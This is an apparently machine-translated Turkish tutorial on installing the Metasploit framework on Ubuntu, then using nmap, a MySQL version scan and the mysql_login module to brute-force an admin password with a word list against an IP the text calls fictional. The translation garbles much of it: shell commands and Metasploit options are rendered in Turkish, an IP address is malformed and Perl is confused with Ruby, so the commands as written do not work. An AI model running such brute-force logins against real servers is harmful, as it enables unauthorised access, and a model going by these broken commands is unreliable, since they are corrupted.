Sunucu güvenliğini test etmek için Metasploit çerçevesi

İçindekiler
Metasploit Çerçevesi, bir bir bilgisayar veya sunucuya karşı açıklardan yararlanma geliştirme ve çalıştırma aracı. Metasploit Framework Ruby dilinde yazılmıştır, çok platformludur ve çalışması için güçlü bir bilgisayar gerektirir, topluluk için ücretli bir sürümü ve ücretsiz bir sürümü vardır.
www.metasploit.com/framework/download adresinden indirilebilir.
içine kurulum yapacağız Linux Ubutnu'su, ancak bazı komutları değiştirerek diğer dağıtımlar için çalışır.
Perl ile çalışmadan önce terminal penceresine erişir ve Ruby'yi kurarız, ancak tamamen yeni programlanmıştır.
Daha sonra çerçeveyi çalıştırabilmemiz için Ruby bağımlılıklarını kuruyoruz.
 sudo apt-get kurulumu ruby ​​libruby rdoc sudo apt-get kurulumu libyaml-ruby sudo apt-get kurulumu libzlib-ruby sudo apt-get kurulumu libopenssl-ruby sudo apt-get kurulumu libdl-ruby sudo apt-get kurulumu libreadline-ruby sudo apt -get kurulumu libiconv-ruby sudo apt-get kurulumu rubygems * sudo apt-get kurulumu libgtk2-ruby libglade2-ruby 

Daha sonra termink'ten indirdiğimiz sürüme göre 32 veya 64 bit izin vereceğiz:
chmod + x metasploit-latest-linux-x64-installer.run

Yükleyiciyi çalıştırıyoruz ve yükleme penceresi açılacak:
sudo metasploit-latest-linux-x64-installer.run

Aşağıdaki Fordward'a tıklayacağız), bir servis olarak kurulacağını ve işgal edeceği portu tanımlıyoruz, varsayılan olarak kullanıyor. 3790.
Kurulumun sonunda terminal penceresinden ve root erişimi ile çerçeveyi güncelliyoruz
komutla:
msfupdate

Metasploit, tamamen terminalde çalışan grafik ortamı olmayan bir programdır. Yazılıma terminalden şu komutla erişiyoruz:
msfconsole

MSF'yi dahili olarak tanımak
MSF (Metasploit Çerçevesi) Aşağıdakiler gibi bir dizi modülde yapılandırılmıştır:

İstismarlar MSF'de bulunan ve kullanabileceğimiz komut dosyaları ve programlar nelerdir, bunlar işletim sistemi ve kategorilere göre düzenlenir, örneğin, Windows'ta çalışan tarayıcılar için kullanılabilen açıklar / pencereler / tarayıcı / açıklar.

Yükler: Test ettiğimiz zafiyetin bulunup istismar edilmesi durumunda yapılacak olan eylemdir.

Ek: yardımcı / tarayıcı / bağlantı noktası taraması / tcp gibi farklı işlevlere sahip yardımcı komut dosyaları ve bu tcp bağlantı noktası tarayıcısını kullanarak bağlantı noktası durumunu elde ederiz. Bu komut dosyası Nmap'e bir alternatiftir.

Enconders: Bazı antivirüs ve antispammer'lardan kaçmak için komut dosyası kodluyorlar.

Yürüttüğümüz terminalden bir test örneği başlatıyoruz:
./msfconsole

Metsploit istemi msf> şeklindedir, oradan her şeyi yürüteceğiz ve çıkmak için sadece çıkış yazacağız
nmap ile bir ip tarayarak başlayacağız
msf> nmap -sV 190.155.80.110

mysql üzerinde çalışmayı sağlayacak script araçlarına erişmek için yardımcı modülü aktif hale getiriyoruz. Modülün sürümünü de görebiliriz.

sürümünü taratıyoruz mysql, bariz nedenlerden dolayı ip hayalidir ve sadece örnek için:
 msf> yardımcı (mysql_version)> RHOSTS 190.155.80.110 // uzak ipi ayarlayın msf> RHOSTS 192.155.80.110 ayarla msf> yardımcı (mysql_version)> çalıştırın // mysql sürümünü kontrol edin 

Doğru yürütülürse, mysql sürümünü döndürebilir:
[*] 190.155.80.110 Mysql5.0 çalıştırıyor

Tarama modülüyle ilgili başka bir durum ve mysql'nin kök kullanıcısını değiştirmeye çalışmak:
 msf> tarayıcı kullan / mysql / mysql_login msf> KULLANICI ADI admin ayarla msf> PASS_FILE /tmp/keys.lst // metin dosyasını olası anahtarların altında olacak şekilde ayarla msf> istismar 

İşe yararsa, mysql'e giriş yapabiliriz:
mysql -h 1920,155,80,110 -u yönetici -pkey

Arkadaşlarınızla sayfasını paylaşan sitenin gelişimine yardımcı olacak

wave wave wave wave wave